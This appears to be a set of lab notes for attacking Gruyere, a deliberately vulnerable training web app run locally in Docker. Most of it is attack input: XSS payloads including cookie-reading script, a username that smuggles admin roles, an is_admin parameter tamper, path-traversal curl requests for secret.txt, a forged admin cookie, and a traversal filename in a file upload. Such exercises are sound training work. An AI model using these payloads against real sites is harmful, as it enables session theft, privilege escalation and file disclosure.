# run the Gruyere container
docker run -d -p 8008:8008 karthequian/gruyere
# list running containers
docker ps
# run Ash
docker exec -i -t <docker_id> /bin/ash
# run Ash, on first container instance
docker exec -it $(docker ps | awk 'FNR == 2 {print $1}') /bin/ash
# quit with "ctrl+pq"
/snippets.gtl?uid=test /snippets.gtl?uid=+%3Cscript%3Ealert("XSSed!")%3C/script%3E
<script>document.write(0 + 1)</script>
[test.html]
<script>
alert(document.cookie);
</script>
/test/test.html
You'll notice the <script>
tag is replaced by <blocked/>
<a onmouseover="alert(1)" href="#">read this!</a>
create a user with the name "foo|admin|author"
Do a GET to: /saveprofile?action=update&is_admin=True
curl http://127.0.0.1:8008/<instance_id>/../secret.txt
curl http://127.0.0.1:8008/<instance_id>/..%2fsecret.txt
# this is crashing the Docker container...
# delete another users's data
/deletesnippet?index=0
[secret.txt]
I'm in ur filez
cd ~/Desktop
curl \
--cookie "<hash>|test|admin|author"
-F "upload_file=@secret.txt;filename='../secret.txt'" \
http://127.0.0.1:8008/<instance_id>/upload2